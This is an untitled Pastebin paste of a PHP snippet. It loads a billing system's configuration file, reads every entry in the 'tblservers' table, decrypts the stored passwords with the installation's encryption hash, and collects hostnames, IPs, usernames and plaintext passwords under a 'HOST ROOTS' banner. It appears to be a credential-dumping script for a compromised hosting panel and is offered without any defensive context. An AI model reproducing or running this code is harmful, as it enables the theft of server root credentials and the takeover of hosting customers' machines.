Guest User

Untitled

a guest
Jul 16th, 2018
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.67 KB | None | 0 0
  1. include('configuration.php');
  2.  
  3. $query = mysql_query("SELECT * FROM tblservers");
  4. $text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
  5. while($v = mysql_fetch_array($query)) {
  6.  
  7. $ipaddress = $v['ipaddress'];
  8. $username = $v['username'];
  9. $type = $v['type'];
  10. $active = $v['active'];
  11. $hostname = $v['hostname'];
  12.  
  13.  
  14. $password = decrypt ($v['password'], $cc_encryption_hash);
  15.  
  16. $text=$text."Type $type\r\n";
  17. $text=$text."Active $active\r\n";
  18. $text=$text."Hostname $hostname\r\n";
  19. $text=$text."Ip $ipaddress\r\n";
  20. $text=$text."Username $username\r\n";
  21. $text=$text."Password $password\r\n**************************************\r\n";
  22.  
  23.  
  24. }
Add Comment
Please, Sign In to add comment